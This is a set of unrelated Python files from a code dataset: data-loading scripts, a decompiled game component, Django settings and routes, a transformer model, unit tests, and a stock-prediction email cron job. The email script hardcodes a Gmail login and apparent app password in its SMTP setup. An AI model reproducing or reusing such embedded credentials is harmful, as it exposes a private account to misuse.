baseDf.drop_duplicates(subset = ['cc_uid','cc_age'],keep = 'first', inplace = True)\r\n baseDf.sort_values(by = ['cc_age'], ascending = True, inplace = True)\r\n \r\n # 每个用户求和\r\n #single.sort_values(by = ['cc_investable_asset'], ascending = True, inplace = True)\r\n\r\n # 找数据方便计算收入和开支的关系\r\n db = batch.connection('prophet')\r\n metadata = sql.MetaData(bind=db)\r\n t = sql.Table('prophet_cash_cycle', metadata, autoload=True)\r\n columns = [\r\n t.c.cc_uid,\r\n t.c.cc_age,\r\n t.c.cc_expenditure_asset,\r\n t.c.created_at,\r\n ]\r\n s = sql.select(columns)\r\n df1 = pd.read_sql(s,db)\r\n df1.sort_values(by = ['created_at'], ascending = False, inplace = True)\r\n df1.columns = ['uid','age','expenditure','created_at']\r\n df1.drop_duplicates(subset = ['uid','age'],keep = 'first', inplace = True)\r\n df1.drop('created_at', axis = 1, inplace = True)\r\n df1.set_index(['uid', 'age'], inplace = 
True)\r\n \r\n db = batch.connection('prophet')\r\n metadata = sql.MetaData(bind=db)\r\n t = sql.Table('prophet_family_income_detail', metadata, autoload=True)\r\n columns = [\r\n t.c.fi_uid,\r\n t.c.fi_age,\r\n t.c.fi_income_asset,\r\n t.c.created_at,\r\n ]\r\n s = sql.select(columns)\r\n df2 = pd.read_sql(s,db)\r\n df2.sort_values(by = ['created_at'], ascending = False, inplace = True)\r\n df2.columns = ['uid','age','income','created_at']\r\n income = df2.copy().groupby(['uid','age'])['income'].sum()\r\n df2.drop('income', axis = 1, inplace = True)\r\n df2.drop_duplicates(subset = ['uid','age'],keep = 'first', inplace = True)\r\n df2.set_index(['uid', 'age'], inplace = True)\r\n df2['income'] = income\r\n df2.drop('created_at', axis = 1, inplace = True)\r\n \r\n df = pd.merge(df1, df2, left_index = True, right_index = True)\r\n \r\n excel = pd.ExcelWriter('output.xlsx')\r\n baseDf.to_excel(excel,'年开支和年龄的关系')\r\n df.to_excel(excel, '年收入和年支出的关系')\r\n excel.save() \r\n\r\n\r\nif __name__ == '__main__':\r\n optParser = OptionParser(usage='usage: %prog [options]')\r\n startId = '0000000000'\r\n endId = '9999999999'\r\n optParser.add_option('-s', '--suid', help='start uid', dest='suid', type='string', default=startId)\r\n optParser.add_option('-e', '--euid', help='end uid', dest='euid', type='string', default=endId)\r\n options,args = optParser.parse_args()\r\n load = load(options.suid, options.euid)\r\n load.data()\r\n","sub_path":"shell/loadData.py","file_name":"loadData.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429324114","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\objects\\components\\new_object_component.py\n# Compiled at: 2017-06-07 20:18:54\n# Size of source mod 2**32: 2873 bytes\nimport operator\nfrom interactions.base.super_interaction import SuperInteraction\nfrom objects.components import Component\nfrom sims4.tuning.tunable import TunableSet\nfrom statistics.commodity import Commodity\nimport objects.components.types, sims4\n\nclass NewObjectTuning:\n NEW_OBJECT_COMMODITY = Commodity.TunableReference()\n NEW_OBJECT_AFFORDANCES = TunableSet(description='\\n Affordances available on an object as long as its considered as new.\\n ',\n tunable=SuperInteraction.TunableReference(description='\\n Affordance reference to add to new objects.\\n ',\n pack_safe=True))\n\n\nclass NewObjectComponent(Component, component_name=objects.components.types.NEW_OBJECT_COMPONENT, allow_dynamic=True):\n\n def __init__(self, *args, **kwargs):\n (super().__init__)(*args, **kwargs)\n self._initialize_commodity()\n self.owner.is_new_object = True\n\n def _initialize_commodity(self):\n new_object_commodity = self.owner.commodity_tracker.add_statistic(NewObjectTuning.NEW_OBJECT_COMMODITY)\n threshold = sims4.math.Threshold(new_object_commodity.min_value, operator.le)\n self._commodity_listener = self.owner.commodity_tracker.create_and_add_listener(NewObjectTuning.NEW_OBJECT_COMMODITY.stat_type, threshold, self._new_object_expired)\n\n def component_super_affordances_gen(self, **kwargs):\n if not self.owner.is_new_object:\n return\n yield from NewObjectTuning.NEW_OBJECT_AFFORDANCES\n if False:\n yield None\n\n def _new_object_expired(self, stat):\n self.owner.is_new_object = False\n 
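# The newness commodity hit its minimum: detach the listener before removing the component\n        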
self.owner.commodity_tracker.remove_listener(self._commodity_listener)\n self.owner.remove_component(objects.components.types.NEW_OBJECT_COMPONENT)\n\n def on_add(self, *_, **__):\n self.owner.update_component_commodity_flags()\n\n def on_remove(self, *_, **__):\n self.owner.update_component_commodity_flags()\n if self._commodity_listener is None:\n return\n self.owner.commodity_tracker.remove_listener(self._commodity_listener)\n self._commodity_listener = None","sub_path":"Scripts/simulation/objects/components/new_object_component.py","file_name":"new_object_component.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"250353158","text":"import os, copy\nimport smtplib\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\nfrom string import Template\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom IPython.display import Image\n#알고리즘 자동화\nimport sqlite3\nfrom cron_lstm import main_lstm\nfrom cron_prophet import fb_main_am\nimport numpy as np\nfrom datetime import datetime, timedelta\n\n\nBASE = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nclass EmailHTMLContent:\n # 이메일에 담길 컨텐츠\n def __init__(self, str_subject, str_image_file_name1,str_image_file_name2,template, template_params1, template_params2, template_params3):\n #string template과 딕셔너리형 template_params를 받아 MIME 메세지 생성\n # EmailHTMLContent(str_subject, str_image_file_name1,str_image_file_name2, template, template_params1, template_params2, template_params3)\n # assert 조건, 메세지\n assert isinstance(template, Template)\n assert isinstance(template_params1, dict)\n assert isinstance(template_params2, dict)\n assert isinstance(template_params3, dict)\n self.msg = MIMEMultipart()\n \n # 이메일 제목 설정\n self.msg['Subject'] = str_subject\n \n # 이메일 본문 설정\n str_msg = template.safe_substitute(**template_params1, **template_params2, **template_params3) # ${변수} 치환하며 문자열 만듬\n \n mime_msg = MIMEText(str_msg, 'html') # MIME HTML 문자열 만듬\n self.msg.attach(mime_msg)\n \n assert template.template.find(\"cid:\" + str_cid_name1) >= 0, 'template must have cid for embedded image.'\n assert os.path.isfile(str_image_file_name1), 'image file does not exist.'\n with open(str_image_file_name1, 'rb') as img_file:\n mime_img = MIMEImage(img_file.read())\n mime_img.add_header('Content-ID', '<' + str_cid_name1+ '>')\n self.msg.attach(mime_img)\n\n assert template.template.find(\"cid:\" + str_cid_name2) >= 0, 'template must have cid for embedded image.'\n assert os.path.isfile(str_image_file_name2), 'image file does not exist.'\n with open(str_image_file_name2, 'rb') as img_file:\n mime_img = MIMEImage(img_file.read())\n mime_img.add_header('Content-ID', '<' + str_cid_name2+ '>')\n self.msg.attach(mime_img) \n \n def get_message(self, from_email_address, to_email_address):\n # 발신자, 수신자 리스트를 이용하여 보낼 메세지를 만든다\n mm = copy.deepcopy(self.msg)\n mm['From'] = from_email_address #발신자\n mm['To'] = \",\".join(to_email_address) #수신자 리스트\n return mm\n \nclass EmailSender:\n #이메일 발송자\n def __init__(self, str_host, num_port=25):\n #호스트와 포트번호로 SMTP 연결\n self.str_host = str_host\n self.num_port = num_port\n self.ss = smtplib.SMTP(str_host, num_port)\n self.ss.starttls() #TLS시작\n self.ss.login('bziwnsizd@gmail.com', 'kzifazlwreorlycn') #메일서버에 연결한 계정과 비밀번호\n \n def send_message(self, emailContent, from_email_address, to_email_address):\n #이메일 발송\n cc = 
emailContent.get_message(from_email_address, to_email_address)\n self.ss.send_message(cc, from_addr=from_email_address, to_addrs=to_email_address)\n del cc\n\ndef conv_stock(stock_name):\n content = stock_name\n url = 'https://search.daum.net/search?w=tot&DA=YZR&t__nil_searchbox=btn&sug=&sugo=&sq=&o=&q={0}주식'.format(content)\n html = requests.get(url).text.strip()\n soup = BeautifulSoup(html, 'html5lib')\n print(url)\n stock_num1 = soup.find(\"span\", {\"class\":\"txt_sub\"}).get_text()\n # stock_num = stock_num1\n stock_num = str(stock_num1[:6])\n category = str(stock_num1[7:])\n cate = \"\"\n if category == \"코스피\":\n cate='.KS'\n elif category ==\"코스닥\":\n cate=\".KQ\"\n # print(stock_num+cate)\n code=stock_num+cate\n \n return code\n\ndef error_email(comp_name, key):\n print(\"=======에러=========\")\n pass\n \n\n\n# DB 내용 출력\ncon = sqlite3.connect(\"./db.sqlite3\") # ===========> .한개로 줄임(바로 위에 폴더로 이동 후 조회하도록 변경)\n# cursor = moredata로부터 이메일 값만 받아오기\ncursor = con.cursor()\n# corsor_comp = moredata로부터 기업 값만 받아오기\ncoursor_comp = con.cursor()\n# cursor_group = moredata로부터 입력된 이메일에대한 구독한 기업정보들\ncursor_group = con.cursor()\n\n# cursor\ncursor.execute(\"SELECT email FROM blog_moredata;\")\ndb_email = cursor.fetchall()\n# 이메일 중복 제거 \ndb_email = set(db_email) # email 발송 리스트용\n\n# cursor_comp\ncursor.execute(\"SELECT content FROM blog_moredata;\")\ndb_comp = cursor.fetchall()\ncomp_list = []\nfor i in db_comp:\n for j in i:\n comp_list.append(j)\n\ncomp = []\nfor i in db_email:\n for j in i:\n comp.append(j)\n\n# 각 email별 보내야하는 기업들 \na = [] \noutput = {} # 각 기업별 출력값\nfor i in comp:\n # 이메일값\n a.append(i)\n data = i\n # print(data)\n a = []\n # corsor_comp\n cursor_group.execute(\"SELECT content FROM blog_moredata WHERE email = (?);\", (data,))\n corp_list = cursor_group.fetchall() # 출력 예시 [('카카오게임즈',), ('삼성전자',)]\n tmp = []\n out = {}\n # json으로 넘길 수 있는 dictionary 만들기\n for n, tmp_corp in enumerate(corp_list):\n tmp.append(str(tmp_corp[0]))\n # print(\"list로 저장할 기업명 \",tmp)\n # 이메일에 대한 구독한 기업들\n out[i] = tmp\n output.update(out)\nprint(\"dict값\",output) # dict값 [{'ka030202@naver.com': ['카카오게임즈', '삼성전자']}]\n\n\n# =======================================================================================================\n# 알고리즘 시작\n# 머신 이용한 png 출력\n\nfor key, value in output.items(): # db_comp = 기업 정보들\n print(key)\n for corp in value:\n error_result = \"\"\n try:\n event = conv_stock(corp)\n\n #cron_list.py 에 입력값 : 기업종목\n tomorrow_prediction =main_lstm(event)\n print(\"종가예측 가능\",tomorrow_prediction)\n\n #cron_prophet.py 에 입력값 : 기업종목 (날짜의 경우 cron_prophet에서 가져감.)\n real_event = event[:6]\n real1, real2 = fb_main_am(real_event)\n print(\"real stock가능\", real1, real2)\n\n # 이메일 전송 시작\n\n # 이메일에 보낼 기업에 대한 이미지 정보 jpg\n # 기업별로 email 전송\n closing = BASE + '\\\\cron_AM\\\\img\\\\closing_stock\\\\closing_img.png'\n real_am = BASE + '\\\\cron_AM\\\\img\\\\real_time\\\\am_plot.png'\n real_pm = BASE + '\\\\cron_AM\\\\img\\\\real_time\\\\pm_plot.png'\n\n str_host = 'smtp.gmail.com'\n num_port = 587\n\n emailSender = EmailSender(str_host, num_port)\n\n str_subject = '구독하신 오늘의 주가 정보입니다.' # e메일 제목\n template = Template(\"\"\"\n \n \n 기업명 ${NAME}.
\n            <img src=\"cid:my_image1\">
\n            <img src=\"cid:my_image2\">
\n            해당 종목의 오전 추천 매수가는 ${real1} 입니다.<br>
\n            해당 종목의 오전 추천 매도가는 ${real2} 입니다.<br>
\n 테스트입니다.\n \n \"\"\")\n \n # text_message = \"내일의 예측 종가 : {0} \\n\\n\\n 해당종목의 오전 추천 매수가 : {1} \\n\\n\\n 해당종목의 오전 추천 매도가 : {2}\".format(tomorrow_prediction[0],real1, real2 )\n template_params1 = {'NAME':corp}\n template_params2 = {'real1': real1}\n template_params3 = {'real2': real2}\n str_image_file_name1 = BASE + '\\\\cron_AM\\\\img\\\\closing_stock\\\\closing_img.png'\n str_image_file_name2 = BASE + '\\\\cron_AM\\\\img\\\\real_time\\\\real_am.png'\n str_cid_name1 = 'my_image1'\n str_cid_name2 = 'my_image2'\n\n emailHTMLContent = EmailHTMLContent(str_subject, str_image_file_name1,str_image_file_name2, template, template_params1, template_params2, template_params3)\n\n from_email_address = 'bziwnsizd@gmail.com' #발신자\n to_email_address = key \n emailSender.send_message(emailHTMLContent, from_email_address, to_email_address)\n\n # 이미지 삭제해야하는 코드 추가하기\n os.remove(closing)\n os.remove(real_am)\n os.remove(real_pm)\n\n # 비상장 기업 or 신규 기업 or 크롤링 불가\n except ValueError: \n error_email(value,corp)\n except AttributeError: \n error_email(value,corp)\n else:\n print(\"그 밖의 에러\")\n","sub_path":"cron_AM/cron_email_am.py","file_name":"cron_email_am.py","file_ext":"py","file_size_in_byte":9331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"130537693","text":"import unittest\n\nfrom dataAccessLayer.helper import db\nfrom dataAccessLayer.repositories.wordCountRepository import WordCountRepository\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass TestWordCountRepository(unittest.TestCase):\n\n def setUp(self):\n engine = create_engine('sqlite:///:memory:', echo=False)\n db.create_tables(engine)\n\n Session = sessionmaker(bind=engine)\n self.session = Session()\n self.word_count_repository = WordCountRepository(self.session)\n\n\n def tearDown(self):\n self.session.close()\n\n def test_create_word_count_with_one_word(self):\n self.word_count_repository.create_word_count('test', 2, 1)\n\n result_word_count = self.word_count_repository\\\n .get_word_counts_by_website_id(1)\n\n assert result_word_count[0][1] == 'test'\n assert result_word_count[0][2] == 2\n\n def test_create_word_count_with_three_words(self):\n test_words = [('test', 2, 100),\n ('pero', 10, 21),\n ('gusto', 2, 23000)]\n\n for test_word in test_words:\n self.word_count_repository.create_word_count(test_word[0],\n test_word[1],\n test_word[2])\n\n for test_word in test_words:\n result_word_count = self.word_count_repository\\\n .get_word_counts_by_website_id(test_word[2])\n assert result_word_count[0][1] == test_word[0]\n assert result_word_count[0][2] == test_word[1]\n","sub_path":"dataAccessLayer/tests/wordCountRepository_test.py","file_name":"wordCountRepository_test.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"3008050","text":"import sys\r\nsys.path.append('C:/dafapp/ibank/accounting/scripts/appinterface')\r\nimport RemoteCreateJournal\r\nimport com.ihsan.foundation.pobjecthelper as phelper\r\n\r\ndef FunctionMain(config, request, response):\r\n request.KdCabg\r\n request.KdValt\r\n #message for create_candidateJurnal\r\n #format \"keterangan;user_id;nama_tabel_batch;no_urut;tanggal;kodeaplikasi$\"\r\n message = \"'Tes interface CBAT';\"+request.UserID+\";;;Current_Date;$\"\r\n #send to create_candidateJurnal\r\n answer = create_candidateJurnal(config,message,response)\r\n \r\n response.NoBatch = 'M1234'\r\n response.RespCode = '00'\r\n 
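# 'Transaksi Berhasil' is Indonesian for 'transaction successful'\r\n    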
response.RespMesg = 'Transaksi Berhasil'\r\n\r\n#**********************************************************\r\n#function create_candidateJurnal\r\n# DESCRIPTION\r\n# menangkap message date sebuah batch dalam satu form 4gl\r\n# dimana satu batch tersebut menjadi satu jurnal transaksi\r\n# tertentu lalu merubahnya menjadi paket untuk dirubah\r\n# menjadi candidate jurnal\r\n#**********************************************************\r\ndef create_candidateJurnal(config,body_message,returnpacket):\r\n #config.SendDebugMsg('test coba')\r\n # siapkan struktur paket\r\n ph = config.AppObject.CreatePacket()\r\n packet = ph.Packet\r\n packet.AddDataPacketStructureEx('__CandJournalBlock', \\\r\n 'subSystemCode:string;classID:string;keyID:integer;accountLinkType:string;')\r\n packet.AddDataPacketStructureEx('__CandJournal', \\\r\n 'keterangan:string;journalBlocks:__CandJournalBlock;')\r\n packet.BuildAllStructure()\r\n \r\n # parsing antara paremeter dan row\r\n splitPrmRow \t= '$'\r\n splitPrm \t= ';'\r\n splitRow \t= '%'\r\n splitInRow \t= ';'\r\n\r\n arrBody = body_message.split(splitPrmRow)\r\n arrParam = arrBody[0].split(splitPrm)\r\n arrRow = arrBody[1].split(splitRow)\r\n #data di parameter\r\n #0.keterangan , 1.user_id, 2.nama_tabel_batch, 3.no urut, 4 tanggal, 5.kode aplikasi\r\n\r\n dsCJ = packet.AddNewDataset('__CandJournal')\r\n rec = dsCJ.AddRecord()\r\n rec.keterangan = arrParam[0]\r\n\r\n rJB = rec.journalBlocks.AddRecord()\r\n rJB.subSystemCode = \"interface\"\r\n rJB.classID = arrParam[1]\r\n rJB.keyID = arrParam[2]\r\n rJB.systemId = \"interface\"\r\n\r\n #testing\r\n \"\"\"\r\n config.SendDebugMsg('rec.keterangan :' + rec.keterangan)\r\n config.SendDebugMsg('rJB.classID :' + rJB.classID)\r\n config.SendDebugMsg('rJB.keyID :' + str(rJB.keyID))\r\n \"\"\"\r\n \r\n # kirim dalam bentuk paket\r\n\r\n dsRP = packet.AddNewDatasetEx('__JournalBlock', \\\r\n 'idBatch:integer;journalBlockID:integer')\r\n config.BeginTransaction()\r\n try :\r\n config.SendDebugMsg(\"try\")\r\n\r\n RemoteCreateJournal.main(config,dsCJ,dsRP)\r\n config.Commit()\r\n return 1\r\n except :\r\n config.Rollback()\r\n return -1\r\n # normal kembalikan 1 \r\n","sub_path":"scripts/support_handler/create_batch.py","file_name":"create_batch.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"353210330","text":"import torch\nfrom torch import nn, einsum\nimport torch.nn.functional as F\n\nfrom einops import rearrange, repeat\nfrom einops.layers.torch import Rearrange\n# helpers\n\ndef pair(t):\n return t if isinstance(t, tuple) else (t, t)\n\n# classes\n\nclass PreNorm(nn.Module):\n def __init__(self, dim, fn):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n def forward(self, x, **kwargs):\n return self.fn(self.norm(x), **kwargs)\n\nclass FeedForward(nn.Module):\n def __init__(self, dim_in, hidden_dim, dim_out, dropout = 0.):\n super().__init__()\n self.net = nn.Sequential(\n nn.Linear(dim_in, hidden_dim),\n nn.GELU(),\n nn.Dropout(dropout),\n nn.Linear(hidden_dim, dim_out),\n nn.Dropout(dropout)\n )\n def forward(self, x):\n return self.net(x)\n\n\nclass SpatialAttention(nn.Module):\n def __init__(self):\n super().__init__()\n\n def similarity(self, spatial_embedding):\n e0 = spatial_embedding.unsqueeze(2)\n e1 = spatial_embedding.unsqueeze(1)\n dist = (e0 - e1).norm(2, dim=-1)\n sim = (-dist.pow(2)).exp()\n sim = sim / sim.sum(dim=-1, keepdims=True)\n return sim\n\n def forward(self, 
spatial_embedding, z):\n # The relation to Attention is as follows:\n # spatial_embedding is used as key and query\n # z is used as value\n attn = self.similarity(spatial_embedding)\n out = einsum('b i j, b j d -> b i d', attn, z)\n return out\n\n # b, n, _, h = *x.shape, self.heads\n # qkv = self.to_qkv(x).chunk(3, dim = -1)\n # q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv)\n\n # dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale\n # attn = self.attend(dots)\n\n # out = einsum('b h i j, b h j d -> b h i d', attn, v)\n # out = rearrange(out, 'b h n d -> b n (h d)')\n # return self.to_out(out)\n\nclass SpatialTransformer(nn.Module):\n def __init__(self, spatial_dim, z_dim, depth, mlp_dim, dropout=0.):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(nn.ModuleList([\n SpatialAttention(),\n PreNorm(z_dim, FeedForward(\n z_dim, mlp_dim, z_dim, dropout=dropout)),\n PreNorm(z_dim, FeedForward(\n z_dim, mlp_dim, spatial_dim, dropout=dropout))\n ]))\n\n def forward(self, z, spatial_embedding):\n for attn, ffz, ffs in self.layers:\n z = attn(spatial_embedding, z)\n z = ffz(z) + z\n spatial_embedding = ffs(z) + spatial_embedding\n return z, spatial_embedding\n\nclass SpatialViT(nn.Module):\n def __init__(self, spatial_dim, z_dim, depth, mlp_dim,\n dropout = 0., \n emb_dropout = 0.):\n super().__init__()\n\n self.dropout = nn.Dropout(emb_dropout)\n self.transformer = SpatialTransformer(\n spatial_dim, z_dim, depth, mlp_dim, dropout)\n\n def forward(self, z, spatial_embedding):\n z = self.dropout(z)\n z, spatial_embedding = self.transformer(z, spatial_embedding)\n return z, spatial_embedding\n","sub_path":"vit_pytorch/spatialvit.py","file_name":"spatialvit.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"437748690","text":"from django.conf.urls import url\nfrom demo import views\n\nurlpatterns = [\n # 主页\n url(r'^$', views.index, name='index'),\n url(r'^index.html$', views.index, name='index'),\n\n # 动力监控\n url(r'^switch/$', views.switch, name='switch'),\n url(r'^distribution_box/$', views.distribution_box, name='distribution_box'),\n url(r'^dynamo/$', views.dynamo, name='dynamo'),\n url(r'^air_pump/$', views.air_pump, name='air_pump'),\n\n # 环境监控\n url(r'^fresh_air/$', views.fresh_air, name='fresh_air'),\n url(r'^exhaust/$', views.exhaust, name='exhaust'),\n\n url(r'^humiture/$', views.humiture, name='humiture'),\n url(r'^leakage/$', views.leakage, name='leakage'),\n url(r'^lighting/$', views.lighting, name='lighting'),\n\n url(r'^smoke/$', views.smoke, name='smoke'),\n url(r'^protection/$', views.protection, name='protection'),\n # 销售管理\n\n url(r'^customer/$', views.customer, name='customer'),\n url(r'^order/$', views.order, name='order'),\n\n # 生产数据\n url(r'^bom/$', views.bom, name='bom'),\n url(r'^basic_data/$', views.basic_data, name='basic_data'),\n url(r'^technology/$', views.technology, name='technology'),\n url(r'^archives/$', views.archives, name='archives'),\n\n # 生产管理\n url(r'^scheduling/$', views.scheduling, name='scheduling'),\n\n url(r'^purchase/$', views.purchase, name='purchase'),\n url(r'^depute/$', views.depute, name='depute'),\n url(r'^rate/$', views.rate, name='rate'),\n\n # 采购管理\n\n url(r'^supply/$', views.supply, name='supply'),\n url(r'^buy/$', views.buy, name='buy'),\n # 库存管理\n url(r'^material/$', views.material, name='material'),\n url(r'^finished/$', views.finished, name='finished'),\n 
url(r'^accessories/$', views.accessories, name='accessories'),\n\n    # Security monitoring\n    url(r'^people/$', views.people, name='people'),\n    url(r'^video/$', views.video, name='video'),\n\n\n    # Small utility endpoints\n    # Send email\n    url(r'^send_email/$', views.send_email, name='send_email'),\n\n    # Alarm light\n    url(r'^start_warn/$', views.start_warn, name='start_warn'),\n    url(r'^stop_warn/$', views.stop_warn, name='stop_warn'),\n\n\n    # Fan\n    url(r'^start_fan/$', views.start_fan, name='start_fan'),\n    url(r'^stop_fan/$', views.stop_fan, name='stop_fan'),\n\n    # Lighting\n    url(r'^start_light/$', views.start_light, name='start_light'),\n    url(r'^stop_light/$', views.stop_light, name='stop_light'),\n\n\n\n    url(r'^recv_data/$', views.recv_data, name='recv_data'),\n    url(r'^test/$', views.test, name='test'),\n    url(r'^cam/$', views.cam, name='cam'),\n\n\n]\n","sub_path":"python3/django-all/web/demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"535529710","text":"from zope import schema,interface\nfrom interfaces import *\n\nclass ViewReferenceField(schema.Object):\n    interface.implements(IViewReferenceField)\n\n    def __init__(self,**kw):\n        super(ViewReferenceField,self).__init__(IViewReference,\n                                                **kw)\n        \nclass ImageReferenceField(schema.Object):\n    interface.implements(IImageReferenceField)\n    size = schema.fieldproperty.FieldProperty(IImageReferenceField['size'])\n    \n    def __init__(self,**kw):\n        self.size = kw.pop('size',None)\n        super(ImageReferenceField,self).__init__(IImageReference,\n                                                 **kw)\n\nclass ObjectReferenceField(ViewReferenceField):\n\n    interface.implements(IObjectReferenceField)\n\n    def __init__(self,refSchema,**kw):\n        self.refSchema = refSchema\n        super(ObjectReferenceField,self).__init__(**kw)\n\n","sub_path":"z3c.reference/tags/0.0.0/src/z3c/reference/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"311958610","text":"#coding=utf-8\n#!/usr/bin/python\nimport re;\n#Named groups are one of Python's own regex extensions: (?P<name>...). The name is simply the group's name. Apart from having a name, a named group is identical to a capturing group. The `MatchObject` methods that handle capturing groups accept either an integer group number or a string containing the group name. Named groups are numbered as well, so you can retrieve a group's information in two ways:\n#!python\n\nstr=\"5/results/\";\nreg=re.compile(r'^(?P<question_id>[0-9]+)/results/$');\nprint(reg.match(str).group('question_id'));\nprint(reg.match(str).groups());\n\nstr=\"_1010_compute_panel_group.py\"\n\n","sub_path":"regex_P_group_urls.py","file_name":"regex_P_group_urls.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"341291754","text":"from tkinter import *\r\nimport openai\r\n\r\nwith open('key.txt', 'r') as f:\r\n    openai.api_key = f.read()[:-1]\r\n\r\ndef Codex(text, stop):\r\n    request = text.get(1.0, text.index(INSERT)).splitlines()[-1]\r\n    result = AI_answer(request + '\\n', stop)\r\n    text.insert(text.index(INSERT), '\\n' + result)\r\n\r\ndef AI_answer(string, stop=None):\r\n\r\n    response = openai.Completion.create(\r\n        engine=\"davinci-codex\",\r\n        prompt=string,\r\n        temperature=0.4,\r\n        max_tokens=1000,\r\n        top_p=1,\r\n        frequency_penalty=0.5,\r\n        presence_penalty=0,\r\n        stop=stop\r\n    )\r\n    return response['choices'][0]['text']\r\n","sub_path":"code/Codex.py","file_name":"Codex.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"155324422","text":"# 
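To complement the named-group note in the regex record above, both access modes in one check (a small sketch using the same pattern):

import re

m = re.match(r'^(?P<question_id>[0-9]+)/results/$', '5/results/')
assert m.group('question_id') == m.group(1) == '5'  # by name or by number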
------------------------------------------------------------------------------\n#\n# Project: Master Inventory \n# Authors: Fabian Schindler \n#\n# ------------------------------------------------------------------------------\n# Copyright (C) 2016 European Space Agency\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies of this Software or works derived from this Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n# ------------------------------------------------------------------------------\n\n\n\"\"\"\nDjango settings for minv project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nfrom minv.config import GlobalReader\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nMINV_CONFIG_DIR = '/etc/minv'\nMINV_DATA_DIR = '/srv/minv'\nMINV_LOCK_DIR = '/tmp/minv/lock'\nMINV_TASK_MODULES = [\n 'minv.tasks.harvest',\n 'minv.inventory.collection.export',\n 'minv.inventory.backup',\n]\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '{{ secret_key }}'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nTEMPLATE_DEBUG = DEBUG\n\nALLOWED_HOSTS = [\"*\"]\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.gis',\n 'minv',\n 'minv.inventory',\n 'minv.tasks',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n)\n\nROOT_URLCONF = '{{ project_name }}.urls'\n\nWSGI_APPLICATION = '{{ project_name }}.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nreader = 
